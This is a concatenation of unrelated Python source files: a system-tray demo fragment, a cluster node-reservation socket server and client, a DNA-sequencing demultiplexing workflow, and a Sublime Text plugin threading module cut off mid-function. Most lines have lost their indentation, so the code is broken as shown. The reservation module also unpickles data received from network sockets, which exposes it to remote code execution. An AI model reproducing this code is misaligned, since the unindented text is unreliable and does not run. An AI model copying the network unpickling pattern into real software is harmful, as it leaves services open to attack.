sys.path.append(str(pathlib.Path(__file__).parent.parent))
# Use default implementation for platform
#from UltraSystray import SystrayIcon
# Choose specific implementation
from UltraSystray.appindicator import SystrayIcon
icons = pathlib.Path(__file__).parent.parent / 'icons'
assert icons.exists()
icon_file = icons / 'arrow.png'
assert icon_file.exists()
def do_something(menu_item):
print("Doing something for 5 seconds...")
print("This will block the UI!")
time.sleep(5)
print("Done...")
def update_menu():
pass
def run_thread():
# In order for the icon to be displayed, you must provide an icon
tray = SystrayIcon(icon=icon_file, tooltip='Systray demo')
    tray.menu_items = [
{ 'label': 'Quit', 'callback': tray.quit }
]
# Create system tray window and show it
tray.run()
thread = threading.Thread(target=run_thread)
thread.start()
print("Tray started")
print("Doing something else for 5 seconds")
time.sleep(5)
print("Done")
|
reservation.py
|
# Copyright 2017 Yahoo Inc.
# Licensed under the terms of the Apache 2.0 license.
# Please see LICENSE file in the project root for terms.
"""This module contains client/server methods to manage node reservations during TFCluster startup."""
from __future__ import absolute_import
from __future__ import division
from __future__ import nested_scopes
from __future__ import print_function
import logging
import os
import pickle
import select
import socket
import struct
import sys
import threading
import time
from . import util
logger = logging.getLogger(__name__)
TFOS_SERVER_PORT = "TFOS_SERVER_PORT"
TFOS_SERVER_HOST = "TFOS_SERVER_HOST"
BUFSIZE = 1024
MAX_RETRIES = 3
class Reservations:
"""Thread-safe store for node reservations.
Args:
:required: expected number of nodes in the cluster.
"""
def __init__(self, required):
self.required = required
self.lock = threading.RLock()
self.reservations = []
def add(self, meta):
"""Add a reservation.
Args:
      :meta: a dictionary of metadata about a node
"""
with self.lock:
self.reservations.append(meta)
def done(self):
"""Returns True if the ``required`` number of reservations have been fulfilled."""
with self.lock:
return len(self.reservations) >= self.required
def get(self):
"""Get the list of current reservations."""
with self.lock:
return self.reservations
def remaining(self):
"""Get a count of remaining/unfulfilled reservations."""
with self.lock:
return self.required - len(self.reservations)
class MessageSocket(object):
"""Abstract class w/ length-prefixed socket send/receive functions."""
def receive(self, sock):
"""Receive a message on ``sock``."""
msg = None
data = b''
recv_done = False
recv_len = -1
while not recv_done:
buf = sock.recv(BUFSIZE)
if buf is None or len(buf) == 0:
raise Exception("socket closed")
if recv_len == -1:
recv_len = struct.unpack('>I', buf[:4])[0]
data += buf[4:]
recv_len -= len(data)
else:
data += buf
recv_len -= len(buf)
recv_done = (recv_len == 0)
msg = pickle.loads(data)
return msg
def send(self, sock, msg):
"""Send ``msg`` to destination ``sock``."""
data = pickle.dumps(msg)
buf = struct.pack('>I', len(data)) + data
sock.sendall(buf)
class Server(MessageSocket):
"""Simple socket server with length-prefixed pickle messages.
Args:
:count: expected number of nodes in the cluster.
"""
reservations = None #: List of reservations managed by this server.
done = False #: boolean indicating if server should be shutdown.
def __init__(self, count):
assert count > 0, "Expected number of reservations should be greater than zero"
self.reservations = Reservations(count)
def await_reservations(self, sc, status={}, timeout=600):
"""Block until all reservations are received."""
timespent = 0
while not self.reservations.done():
logger.info("waiting for {0} reservations".format(self.reservations.remaining()))
# check status flags for any errors
if 'error' in status:
sc.cancelAllJobs()
sc.stop()
sys.exit(1)
time.sleep(1)
timespent += 1
if (timespent > timeout):
raise Exception("timed out waiting for reservations to complete")
logger.info("all reservations completed")
return self.reservations.get()
def _handle_message(self, sock, msg):
logger.debug("received: {0}".format(msg))
msg_type = msg['type']
if msg_type == 'REG':
self.reservations.add(msg['data'])
MessageSocket.send(self, sock, 'OK')
elif msg_type == 'QUERY':
MessageSocket.send(self, sock, self.reservations.done())
elif msg_type == 'QINFO':
rinfo = self.reservations.get()
MessageSocket.send(self, sock, rinfo)
elif msg_type == 'STOP':
logger.info("setting server.done")
MessageSocket.send(self, sock, 'OK')
self.done = True
else:
MessageSocket.send(self, sock, 'ERR')
def start(self):
"""Start listener in a background thread
Returns:
address of the Server as a tuple of (host, port)
"""
server_sock = self.start_listening_socket()
# hostname may not be resolvable but IP address probably will be
host = self.get_server_ip()
port = server_sock.getsockname()[1]
addr = (host, port)
logger.info("listening for reservations at {0}".format(addr))
def _listen(self, sock):
CONNECTIONS = []
CONNECTIONS.append(sock)
while not self.done:
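        # Multiplex the listening socket and all accepted client connections
        # with select(); new clients are added to CONNECTIONS, and a closed or
        # failing connection is dropped from the list.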
read_socks, write_socks, err_socks = select.select(CONNECTIONS, [], [], 60)
for sock in read_socks:
if sock == server_sock:
client_sock, client_addr = sock.accept()
CONNECTIONS.append(client_sock)
logger.debug("client connected from {0}".format(client_addr))
else:
try:
msg = self.receive(sock)
self._handle_message(sock, msg)
except Exception as e:
logger.debug(e)
sock.close()
CONNECTIONS.remove(sock)
server_sock.close()
t = threading.Thread(target=_listen, args=(self, server_sock))
t.daemon = True
t.start()
return addr
def get_server_ip(self):
return os.getenv(TFOS_SERVER_HOST) if os.getenv(TFOS_SERVER_HOST) else util.get_ip_address()
def start_listening_socket(self):
port_number = int(os.getenv(TFOS_SERVER_PORT)) if os.getenv(TFOS_SERVER_PORT) else 0
server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_sock.bind(('', port_number))
server_sock.listen(10)
return server_sock
def stop(self):
"""Stop the Server's socket listener."""
self.done = True
class Client(MessageSocket):
"""Client to register and await node reservations.
Args:
:server_addr: a tuple of (host, port) pointing to the Server.
"""
sock = None #: socket to server TCP connection
server_addr = None #: address of server
def __init__(self, server_addr):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect(server_addr)
self.server_addr = server_addr
logger.info("connected to server at {0}".format(server_addr))
def _request(self, msg_type, msg_data=None):
"""Helper function to wrap msg w/ msg_type."""
msg = {}
msg['type'] = msg_type
if msg_data:
msg['data'] = msg_data
done = False
tries = 0
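    # Retry the send up to MAX_RETRIES times, re-opening the TCP connection to
    # the server after each socket error before giving up.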
while not done and tries < MAX_RETRIES:
try:
MessageSocket.send(self, self.sock, msg)
done = True
except socket.error as e:
tries += 1
if tries >= MAX_RETRIES:
raise
print("Socket error: {}".format(e))
self.sock.close()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect(self.server_addr)
logger.debug("sent: {0}".format(msg))
resp = MessageSocket.receive(self, self.sock)
logger.debug("received: {0}".format(resp))
return resp
def close(self):
"""Close the client socket."""
self.sock.close()
def register(self, reservation):
"""Register ``reservation`` with server."""
resp = self._request('REG', reservation)
return resp
def get_reservations(self):
"""Get current list of reservations."""
cluster_info = self._request('QINFO')
return cluster_info
def await_reservations(self):
"""Poll until all reservations completed, then return cluster_info."""
done = False
while not done:
done = self._request('QUERY')
time.sleep(1)
return self.get_reservations()
def request_stop(self):
"""Request server stop."""
resp = self._request('STOP')
return resp
|
workflow.py
|
"""Implementation of the workflow for demultiplexing sequencing directories."""
import collections
import csv
import glob
import gzip
import itertools
import json
import logging
import os
import shutil
import subprocess
import sys
from threading import Thread, Lock
import tempfile
import xml.etree.ElementTree as ET
from snakemake.exceptions import WorkflowError
from digestiflow_demux import __version__
from .bases_mask import split_bases_mask, return_bases_mask, BaseMaskConfigException
from .api_client import ApiClient, ApiException
from .exceptions import ApiProblemException, MissingOutputFile
#: Path to the Snakefile.
PATH_SNAKEFILE = os.path.abspath(os.path.join(os.path.dirname(__file__), "Snakefile"))
#: Template for the success message.
TPL_MSG_SUCCESS = r"""
The demultiplexing succeeded for flow cell {flowcell[vendor_id]}.
See the attached files for quality reports.
The following attachments were not present (this is OK for HTML reports that are not generated
by Picard):
{missing_log_files}
--
This message was auto-created by digestiflow-demux v{version}.
"""
#: Template for the failure message.
TPL_MSG_FAILURE = r"""
The attempted demultiplexing for flow cell {flowcell[vendor_id]} has failed.
To try again, clean up any output files and mark as "ready" for demultiplexing again.
--
This message was auto-created by digestiflow-demux v{version}.
"""
def write_sample_sheet_v1(writer, flowcell, libraries):
"""Write V1 sample sheet"""
header = [
"FCID",
"Lane",
"SampleID",
"SampleRef",
"Index",
"Description",
"Control",
"Recipe",
"Operator",
"SampleProject",
]
writer.writerow(header)
demux_reads = flowcell.get("demux_reads") or flowcell["planned_reads"]
demux_reads = split_bases_mask(demux_reads)
lens = [count for base, count in demux_reads if base == "B"]
recipe = "PE_indexing" if demux_reads.count("T") > 1 else "SE_indexing"
for lib in libraries:
if lib["barcode2"]:
barcode = "".join((lib["barcode"][: lens[0]], "-", lib["barcode2"][: lens[1]]))
else:
barcode = lib["barcode"][: lens[0]]
for lane in sorted(lib["lanes"]):
data = [
flowcell["vendor_id"],
lane,
lib["name"],
lib["reference"],
barcode,
"",
"N",
recipe,
flowcell["operator"],
"Project",
]
writer.writerow(list(map(str, data)))
def write_sample_sheets_v2(flowcell, libraries, output_dir):
"""Write V2 sample sheets. Write one sample sheet for each bases_mask in the config."""
# re-shuffle dict from lib - lane - bases_mask to bases_mask - lib
d = collections.defaultdict(dict)
for key, lib in enumerate(libraries):
d[lib.get("demux_reads_override", flowcell["demux_reads"])][key] = lib
for bases_mask, libraries in d.items():
os.makedirs(
os.path.join(output_dir, "illumina_basesmask/{}".format(bases_mask)), exist_ok=True
)
with open(
os.path.join(output_dir, "illumina_basesmask/{}/SampleSheet.csv".format(bases_mask)),
"w",
) as f:
writer = csv.writer(f, delimiter=",")
write_sample_sheet_v2(writer, flowcell, libraries.values())
def write_sample_sheet_v2(writer, flowcell, libraries):
"""Write V2 sample sheet"""
# Write [Data] Section
writer.writerow(["[Data]"])
dual_indexing = any(library["barcode2"] for library in libraries)
if dual_indexing:
writer.writerow(["lane", "sample_id", "index", "index2", "sample_project"])
else:
writer.writerow(["lane", "sample_id", "index", "sample_project"])
rows = []
for lib in libraries:
for lane in sorted(lib["lanes"]):
barcodes = lib["barcode"].split(",")
for barcode in barcodes:
row = [lane, lib["name"], barcode]
if dual_indexing:
row.append(lib["barcode2"])
row.append("Project")
rows.append(row)
for row in sorted(rows):
writer.writerow(list(map(str, row)))
def write_sample_sheet_picard(flowcell, libraries, output_dir):
"""Write picard sample sheets, one per lane."""
dual_indexing = any(library["barcode2"] for library in libraries)
if not dual_indexing:
head_barcodes = ["barcode_sequence_1", "barcode_name", "library_name"]
head_samplesheet = ["OUTPUT_PREFIX", "BARCODE_1"]
else:
head_barcodes = ["barcode_sequence_1", "barcode_sequence_2", "barcode_name", "library_name"]
head_samplesheet = ["OUTPUT_PREFIX", "BARCODE_1", "BARCODE_2"]
# re-shuffle dict from lib - lane - barcode to lane - lib - barcode because picard works on lanes
d = collections.defaultdict(dict)
for lib in libraries:
for lane in sorted(lib["lanes"]):
d[lane][lib["name"]] = lib
# add Undetermined to samplesheet as picard crashes otherwise
for lane in d:
d[lane]["Undetermined"] = {"name": "Undetermined", "barcode": "N", "barcode2": ""}
if dual_indexing:
d[lane]["Undetermined"]["barcode2"] = "N"
for lane, libraries in d.items():
barcode_rows = []
samples_rows = []
for lib in libraries.values():
output_prefix = "{lane}/{name}".format(
name=lib["name"], flowcell=flowcell["vendor_id"], lane=lane
)
if dual_indexing:
                # we do not pass the barcode names, so we use the sample name.
barcode_row = [lib["barcode"], lib["barcode2"], lib["name"], lib["name"]]
samples_row = [output_prefix, lib["barcode"], lib["barcode2"]]
else:
barcode_row = [lib["barcode"], lib["name"], lib["name"]]
samples_row = [output_prefix, lib["barcode"]]
# barcode file should not contain dummy for unbarcoded reads, but samplesheet must.
if not lib["name"] == "Undetermined":
barcode_rows.append(barcode_row)
samples_rows.append(samples_row)
os.makedirs(os.path.join(output_dir, "picard_barcodes/{}".format(lane)), exist_ok=True)
with open(
os.path.join(output_dir, "picard_barcodes/{}/barcodes.txt".format(lane)), "w"
) as bf, open(
os.path.join(output_dir, "picard_barcodes/{}/samplesheet.txt".format(lane)), "w"
) as sf:
barcodewriter = csv.writer(bf, delimiter="\t")
sampleswriter = csv.writer(sf, delimiter="\t")
barcodewriter.writerow(head_barcodes)
sampleswriter.writerow(head_samplesheet)
for row in sorted(barcode_rows):
barcodewriter.writerow(list(map(str, row)))
for row in sorted(samples_rows):
sampleswriter.writerow(list(map(str, row)))
def reverse_complement(seq):
"""Return reverse-complemented version of ``seq``."""
mapping = {"A": "T", "a": "t", "C": "G", "c": "g", "G": "C", "g": "c", "T": "A", "t": "a"}
return "".join(reversed([mapping.get(i, i) for i in seq]))
def load_run_info(path_run_info_xml):
"""Load information from ``RunInfo.xml`` file."""
with open(path_run_info_xml, "rt") as xmlf:
xmls = xmlf.read()
root = ET.fromstring(xmls)
tag_run = root.find("Run")
return {
"run_id": tag_run.attrib["Id"],
"instrument": tag_run.find("Instrument").text,
"run_no": tag_run.attrib["Number"],
"flowcell": tag_run.find("Flowcell").text,
}
def load_run_parameters(path_run_parameters_xml):
"""Load information from ``runParameters.xml`` file."""
with open(path_run_parameters_xml, "rt") as xmlf:
xmls = xmlf.read()
root = ET.fromstring(xmls.lower())
version_string = next(root.iter("rtaversion")).text
if version_string.startswith("v"):
version_string = version_string[1:]
rta_version = tuple(map(int, version_string.split(".")))
return {"rta_version": rta_version}
def remove_old_samplesheets(output_dir):
"""Remove old sample sheets so that snakemake does not get confused."""
fls = ["SampleSheet.csv", "picard_barcodes", "illumina_basesmask"]
fls = [os.path.join(output_dir, f) for f in fls]
for f in fls:
if os.path.isdir(f):
shutil.rmtree(f)
elif os.path.exists(f):
os.remove(f)
def create_sample_sheet(config, input_dir, output_dir): # noqa: C901
"""Query the Digestiflow API for the necessary information for building the sample sheet."""
logging.info("Perform API queries and create sample sheet")
client = ApiClient(
api_url=config.api_url, api_token=config.api_token, project_uuid=config.project_uuid
)
logging.debug("Parsing RunInfo.xml file")
run_info = load_run_info(os.path.join(input_dir, "RunInfo.xml"))
path_run_info = glob.glob(os.path.join(input_dir, "?un?arameters.xml"))[0]
run_parameters = load_run_parameters(path_run_info)
logging.debug("RTA version is: %s", run_parameters["rta_version"])
logging.debug("Querying API for flow cell")
try:
flowcell = client.flowcell_resolve(
instrument_id=run_info["instrument"],
run_no=run_info["run_no"],
flowcell_id=run_info["flowcell"],
)
except ApiException as e:
raise ApiProblemException("Problem querying API for flow cell") from e
if flowcell is None:
logging.warning("Could not resolve flow cell via API. Not proceeding.")
return None
if flowcell["status_conversion"] != "ready" and not config.force_demultiplexing:
logging.warning('Status is not "ready", will skip flow cell.')
return None
if not flowcell["libraries"]:
logging.warning("There are no libraries in flow cell. I'm refusing to continue.")
return None
if not config.api_read_only:
try:
client.flowcell_update(flowcell["sodar_uuid"], status_conversion="in_progress")
except ApiException as e:
raise ApiProblemException('Could not update conversion status to "in_progress"') from e
logging.debug("Querying API for sequencing machine information")
try:
sequencer = client.sequencer_retrieve(sequencer=run_info["instrument"])
except ApiException as e:
raise ApiProblemException("Problem querying API for sequencer") from e
logging.debug("Querying for barcode information")
libraries = []
demux_reads_override = set()
for library in flowcell["libraries"]:
if not library["lane_numbers"]:
continue # do not consider library any further
if library.get("barcode_seq"):
barcode_seq = library.get("barcode_seq")
elif library.get("barcode"):
try:
barcode = client.barcodesetentry_retrieve(barcodesetentry=library.get("barcode"))
except ApiException as e:
raise ApiProblemException("Problem querying API for barcode #1") from e
barcode_seq = barcode["sequence"]
else:
barcode_seq = ""
if library.get("barcode_seq2"):
barcode_seq2 = library.get("barcode_seq2")
elif library.get("barcode2"):
try:
barcode2 = client.barcodesetentry_retrieve(barcodesetentry=library.get("barcode2"))
except ApiException as e:
raise ApiProblemException("Problem querying API for barcode #2") from e
barcode_seq2 = barcode2["sequence"]
else:
barcode_seq2 = ""
if sequencer["dual_index_workflow"] == "B":
barcode_seq2 = reverse_complement(barcode_seq2)
if library["demux_reads"]:
demux_reads = library["demux_reads"]
else:
demux_reads = flowcell["demux_reads"] or flowcell["planned_reads"]
try:
demux_reads = return_bases_mask(flowcell["planned_reads"], demux_reads, "picard")
demux_reads_override.add(demux_reads)
except BaseMaskConfigException as e:
logging.warning("There is a problem with the bases mask. %s", e)
logging.exception(e, exc_info=True)
libraries.append(
{
"name": library["name"],
"reference": library["reference"],
"barcode": barcode_seq,
"barcode2": barcode_seq2,
"lanes": library["lane_numbers"],
"demux_reads_override": demux_reads,
}
)
# Get delivery type from flowcell information.
delivery_type = flowcell["delivery_type"].split("_")
# Normalize bases masks, decide if paired-end, find all custom bases_masks
planned_reads = flowcell["planned_reads"]
demux_reads = flowcell.get("demux_reads") or planned_reads
demux_reads = return_bases_mask(planned_reads, demux_reads, "picard")
flowcell["demux_reads"] = demux_reads # not used by bcl2fastq2
flowcell["demux_reads_override"] = list(sorted(demux_reads_override))
rta_version = run_parameters["rta_version"]
if "M" in flowcell["demux_reads"]: # TODO: refine condition
demux_tool = "picard"
elif config.demux_tool == "bcl2fastq" and rta_version >= (1, 18, 54):
demux_tool = "bcl2fastq2"
elif config.demux_tool == "bcl2fastq":
demux_tool = "bcl2fastq1"
else:
demux_tool = "picard"
logging.info("Using demux tool %s", demux_tool)
bcl2fastq2_params = {
"with_failed_reads": config.with_failed_reads,
"create_fastq_for_index_reads": flowcell["create_fastq_for_index_reads"],
"minimum_trimmed_read_length": flowcell["minimum_trimmed_read_length"],
"mask_short_adapter_reads": flowcell["mask_short_adapter_reads"],
}
logging.debug("Writing out demultiplexing configuration")
# Get barcode mismatch count or default.
if flowcell["barcode_mismatches"] is None:
if flowcell["rta_version"] == 1:
barcode_mismatches = 0
else:
barcode_mismatches = 1
else:
barcode_mismatches = flowcell["barcode_mismatches"]
with open(os.path.join(output_dir, "demux_config.json"), "wt") as jsonf:
config_json = {
"barcode_mismatches": barcode_mismatches,
"bcl2fastq2_params": bcl2fastq2_params,
"cores": config.cores,
"delivery_type": delivery_type,
"demux_tool": demux_tool,
"flowcell": {**flowcell, "libraries": libraries},
"input_dir": input_dir,
"lanes": config.lanes,
"output_dir": output_dir,
"rta_version": flowcell["rta_version"],
"tiles": config.tiles,
}
json.dump(config_json, jsonf)
logging.debug("Writing out sample sheet information")
remove_old_samplesheets(output_dir)
if demux_tool == "bcl2fastq1":
with open(os.path.join(output_dir, "SampleSheet.csv"), "wt") as csvf:
write_sample_sheet_v1(csv.writer(csvf), flowcell, libraries)
elif demux_tool == "picard":
write_sample_sheet_picard(flowcell, libraries, output_dir)
else:
write_sample_sheets_v2(flowcell, libraries, output_dir)
return flowcell # Everything is fine
def send_flowcell_success_message(client, flowcell, output_dir, *log_files):
if "seq" in flowcell["delivery_type"]:
# Remove log files that do not exist.
existing_log_files = [p for p in log_files if os.path.exists(p)]
missing_log_files = [p for p in log_files if not os.path.exists(p)]
        # Create renamed (and potentially compressed) files.
path_in = os.path.join(output_dir, "multiqc/multiqc_%s")
with tempfile.TemporaryDirectory() as tempdir:
path_out = os.path.join(tempdir, "MultiQC_%%s_%s.%%s" % flowcell["vendor_id"])
with open(path_in % "report.html", "rb") as f_in:
with gzip.open(path_out % ("Report", "html.gz"), "wb") as f_out:
shutil.copyfileobj(f_in, f_out)
shutil.copyfile(path_in % "data.zip", path_out % ("Data", "zip"))
# Post with renamed files.
return client.message_send(
flowcell_uuid=flowcell["sodar_uuid"],
subject="Demultiplexing succeeded for flow cell %s" % flowcell["vendor_id"],
body=TPL_MSG_SUCCESS.format(
flowcell=flowcell,
version=__version__,
missing_log_files="\n".join(missing_log_files) or "none; all found",
),
attachments=list(
itertools.chain(
[path_out % ("Report", "html.gz"), path_out % ("Data", "zip")],
existing_log_files,
)
),
)
else:
# No sequences generated, no MultiQC created.
return client.message_send(
flowcell_uuid=flowcell["sodar_uuid"],
subject="Demultiplexing succeeded for flow cell %s" % flowcell["vendor_id"],
body=TPL_MSG_SUCCESS.format(flowcell=flowcell, version=__version__),
attachments=list(log_files),
)
def send_flowcell_failure_message(client, flowcell, *log_files):
return client.message_send(
flowcell_uuid=flowcell["sodar_uuid"],
subject="Demultiplexing FAILED for flow cell %s" % flowcell["vendor_id"],
body=TPL_MSG_FAILURE.format(flowcell=flowcell, version=__version__),
attachments=log_files,
)
def async_tee_pipe(process, input_file, out_file, out_file2, mutex):
"""Async tee-piping from input_file to two output files using the mutex."""
logging_thread = Thread(target=tee_pipe, args=(process, input_file, out_file, out_file2, mutex))
logging_thread.start()
return logging_thread
def tee_pipe(process, input_file, out_file, out_stream, mutex):
"""Tee-piping from input_file to two output files using the mutex."""
while 1:
line = input_file.readline()
if not line and process.poll() is not None:
break
else:
with mutex:
out_stream.write(line.decode("utf-8"))
out_file.write(line)
def launch_snakemake(config, flowcell, output_dir, work_dir):
"""Launch Snakemake and execute the demultiplexing"""
logging.info("Temporary directory is %s", work_dir)
logging.info("Start Snakemake workflow for demultiplexing")
client = ApiClient(
api_url=config.api_url, api_token=config.api_token, project_uuid=config.project_uuid
)
output_log_dir = os.path.join(output_dir, "log")
output_qc_dir = os.path.join(output_dir, "multiqc")
drmaa_log_dirs = [
os.path.join(output_log_dir, "digestiflow-demux-snakemake.log.gz"),
os.path.join(output_log_dir, "digestiflow-demux.log"),
]
if "seq" in flowcell["delivery_type"]:
drmaa_log_dirs += [
os.path.join(output_qc_dir, "multiqc_data.zip"),
os.path.join(output_qc_dir, "multiqc_report.html"),
]
if config.only_post_message:
for path in drmaa_log_dirs:
if not os.path.exists(path):
raise MissingOutputFile("Cannot post message with %s missing" % path)
if config.only_post_message:
logging.info("Only posting message, not running demultiplexing itself.")
failure = False
else:
argv = [
"--snakefile",
PATH_SNAKEFILE,
"--directory",
work_dir,
"--configfile",
os.path.join(output_dir, "demux_config.json"),
"--cores",
config.cores,
"--drmaa-log-dir",
output_log_dir,
"--max-jobs-per-second",
config.max_jobs_per_second,
"--use-conda",
"--config",
]
if config.jobscript:
argv += ["--jobscript", config.jobscript]
if config.verbose:
argv += ["--verbose", "--printshellcmds"]
if config.drmaa:
argv += ["--drmaa", config.drmaa]
if config.cluster_config:
argv += ["--cluster-config", config.cluster_config]
try:
subprocess.check_output(["which", "mamba"], stderr=subprocess.PIPE)
argv += ["--conda-frontend", "mamba"]
except subprocess.CalledProcessError:
pass
argv = list(map(str, argv))
logging.info("Executing: snakemake %s", " ".join(argv))
try:
# Launch Snakemake
proc = subprocess.Popen(
["snakemake"] + argv, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
# Write output to temporary log file, to be attached later.
log_file_path = os.path.join(config.log_path, "digestiflow-demux-snakemake.log.gz")
with gzip.open(log_file_path, "wb") as log_file:
mutex = Lock()
logger_stderr = async_tee_pipe(proc, proc.stderr, log_file, sys.stderr, mutex)
logger_stdout = async_tee_pipe(proc, proc.stdout, log_file, sys.stdout, mutex)
logger_stderr.join()
logger_stdout.join()
# Copy out log file to log directory.
os.makedirs(output_log_dir, exist_ok=True)
shutil.copy(log_file_path, output_log_dir)
failure = proc.returncode != 0
except WorkflowError as e:
logging.warning("Running demultiplexing failed: %s", e)
failure = True
# Paths to tarballs with Illumina HTML reports.
paths_html_reports = [
os.path.join(output_dir, "html_report_%s.tar.gz" % bases_mask)
for bases_mask in flowcell["demux_reads_override"]
]
if not failure and not config.api_read_only:
message = send_flowcell_success_message(
client, flowcell, output_dir, log_file_path, *paths_html_reports
)
logging.info("Marking flowcell as complete...")
try:
client.flowcell_update(flowcell["sodar_uuid"], status_conversion="complete")
except ApiException as e:
logging.warning("Could not update conversion state to complete via API: %s", e)
logging.info("Done running Snakemake.")
elif flowcell and not config.api_read_only:
message = send_flowcell_failure_message(client, flowcell, log_file_path)
logging.info("Marking flowcell as failed...")
try:
client.flowcell_update(flowcell["sodar_uuid"], status_conversion="failed")
except ApiException as e:
logging.warning("Could not update conversion state to failed via API: %s", e)
else:
message = None
return (not failure, message, flowcell, client)
def perform_demultiplexing(config, input_dir, output_dir):
"""Prepare and execute the demultiplexing with the Snakemake workflow."""
logging.info("Starting to process input directory %s", input_dir)
logging.info("Output will go to %s", output_dir)
logging.debug("Creating output directory %s", output_dir)
os.makedirs(output_dir, exist_ok=True)
flowcell = create_sample_sheet(config, input_dir, output_dir)
if not flowcell:
return False, None, None, None
if config.work_dir:
logging.info("Using work directory %s", config.work_dir)
return launch_snakemake(config, flowcell, output_dir, config.work_dir)
elif config.keep_work_dir:
logging.info("Setup non-temporary work directory")
return launch_snakemake(config, flowcell, output_dir, tempfile.mkdtemp("-cubi-demux"))
else:
logging.info("Setup temporary work directory")
with tempfile.TemporaryDirectory("-cubi-demux") as work_dir:
return launch_snakemake(config, flowcell, output_dir, work_dir)
|
runtime.py
|
from concurrent.futures import Future, ThreadPoolExecutor
from functools import lru_cache, partial, wraps
import inspect
import threading
import uuid
import sublime
import sublime_plugin
MYPY = False
if MYPY:
from typing import Any, Callable, Dict, Iterator, Literal, Optional, Tuple, TypeVar
T = TypeVar('T')
F = TypeVar('F', bound=Callable[..., Any])
Callback = Tuple[Callable, Tuple[Any, ...], Dict[str, Any]]
ReturnValue = Any
savvy_executor = ThreadPoolExecutor(max_workers=1)
# `enqueue_on_*` functions emphasize that we run two queues and
# just put tasks on them, in contrast to `set_timeout_*` which
# emphasizes that we delay or defer something.  (In particular
# `set_timeout_async` is somewhat a misnomer because both calls
# return immediately.)
# All functions have the standard python callable interface
# `(fn, *args, **kwargs)`, which is used in e.g. `partial` or
# `executor.submit`.  This has the advantage that we can swap
# the functions to change the behavior without changing the
# arguments.
def enqueue_on_ui(fn, *args, **kwargs):
# type: (Callable, Any, Any) -> None
sublime.set_timeout(partial(fn, *args, **kwargs))
def enqueue_on_worker(fn, *args, **kwargs):
# type: (Callable, Any, Any) -> None
sublime.set_timeout_async(partial(fn, *args, **kwargs))
def enqueue_on_savvy(fn, *args, **kwargs):
# type: (Callable, Any, Any) -> None
savvy_executor.submit(fn, *args, **kwargs)
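# Minimal usage sketch (the `refresh_view` helper below is hypothetical, not
# part of this module).  Because all enqueue_* functions share the
# `(fn, *args, **kwargs)` interface, the target queue can be swapped without
# touching the call site's arguments.
def _example_enqueue_usage(view):
    def refresh_view(v, reason):
        print("refreshing", v.id(), "because", reason)
    enqueue_on_ui(refresh_view, view, "user action")     # runs on the UI thread
    enqueue_on_worker(refresh_view, view, "background")  # runs on the worker thread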
def run_on_new_thread(fn, *args, **kwargs):
# type: (Callable, Any, Any) -> None
threading.Thread(target=fn, args=args, kwargs=kwargs).start()
def on_new_thread(fn):
@wraps(fn)
def wrapped(*a, **kw):
run_on_new_thread(fn, *a, **kw)
return wrapped
def run_as_future(fn, *args, **kwargs):
# type: (Callable[..., T], object, object) -> Future[T]
fut = Future() # type: Future[T]
def task():
fut.set_running_or_notify_cancel()
try:
rv = fn(*args, **kwargs)
except Exception as e:
fut.set_exception(e)
else:
fut.set_result(rv)
run_on_new_thread(task)
return fut
def run_or_timeout(fn, timeout):
cond = threading.Condition()
result = None
exc = None
def program():
nonlocal cond, exc, result
try:
result = fn()
except Exception as e:
exc = e
finally:
with cond:
cond.notify_all()
with cond:
run_on_new_thread(program)
if not cond.wait(timeout):
raise TimeoutError()
if exc:
raise exc
else:
return result
lock = threading.Lock()
COMMANDS = {} # type: Dict[str, Callback]
RESULTS = {} # type: Dict[str, ReturnValue]
def run_as_text_command(fn, view, *args, **kwargs):
# type: (Callable[..., T], sublime.View, Any, Any) -> Optional[T]
token = uuid.uuid4().hex
with lock:
COMMANDS[token] = (fn, (view, ) + args, kwargs)
view.run_command('gs_generic_text_cmd', {'token': token})
with lock:
# If the view has been closed, Sublime will not run
# text commands on it anymore (but also not throw).
        # For now, we stay quiet: we don't raise and just return
        # `None`.
rv = RESULTS.pop(token, None)
return rv
def text_command(fn):
# type: (F) -> F
@wraps(fn)
def decorated(view, *args, **kwargs):
# type: (sublime.View, Any, Any) -> Optional[T]
return run_as_text_command(fn, view, *args, **kwargs)
return decorated # type: ignore[return-value]
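# Usage sketch (hypothetical function): `text_command` lets a plain function
# taking a `view` run as a Sublime text command; because its signature names
# `edit`, an edit token is injected (see `wants_edit_object` below), and its
# return value is handed back to the caller.
@text_command
def _example_replace_all(view, edit, text):
    # type: (sublime.View, sublime.Edit, str) -> None
    view.replace(edit, sublime.Region(0, view.size()), text)
# e.g. `_example_replace_all(some_view, "hello")`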
@lru_cache()
def wants_edit_object(fn):
sig = inspect.signature(fn)
return 'edit' in sig.parameters
class gs_generic_text_cmd(sublime_plugin.TextCommand):
def run_(self, edit_token, cmd_args):
cmd_args = self.filter_args(cmd_args)
token = cmd_args['token']
with lock:
# Any user can "redo" text commands, but we don't want that.
try:
fn, args, kwargs = COMMANDS.pop(token)
except KeyError:
return
edit = self.view.begin_edit(edit_token, self.name(), cmd_args)
try:
if wants_edit_object(fn):
return self.run(token, fn, args[0], edit, *args[1:], **kwargs)
else:
return self.run(token, fn, *args, **kwargs)
finally:
self.view.end_edit(edit)
def run(self, token, fn, *args, **kwargs):
rv = fn(*args, **kwargs)
with lock:
RESULTS[token] = rv
THROTTLED_CACHE = {}
THROTTLED_LOCK = threading.Lock()
def throttled(fn, *args, **kwargs):
# type: (...) -> Callable[[], None]
token = (fn,)
action = partial(fn, *args, **kwargs)
with THROTTLED_LOCK:
THROTTLED_CACHE[token] = action
def task():
with THROTTLED_LOCK:
ok = THROTTLED_CACHE.get(token) == action
if ok:
action()
return task
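# Behaviour sketch for `throttled`: tasks are keyed by the function only, so
# the most recently scheduled arguments win and stale tasks become no-ops.
# (`render` is a hypothetical callback.)
def _example_throttled_usage():
    def render(value):
        print("render", value)
    first = throttled(render, 1)
    second = throttled(render, 2)
    first()   # no-op: a newer action for `render` has been registered
    second()  # executes render(2)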
AWAIT_UI_THREAD = 'AWAIT_UI_THREAD' # type: Literal["AWAIT_UI_THREAD"]
AWAIT_WORKER = 'AWAIT_WORKER' # type: Literal["AWAIT_WORKER"]
if MYPY:
HopperR = Iterator[Literal["AWAIT_UI_THREAD", "AWAIT_WORKER"]]
HopperFn = Callable[..., HopperR]
def cooperative_thread_hopper(fn):
# type: (HopperFn) -> Callable[..., None]
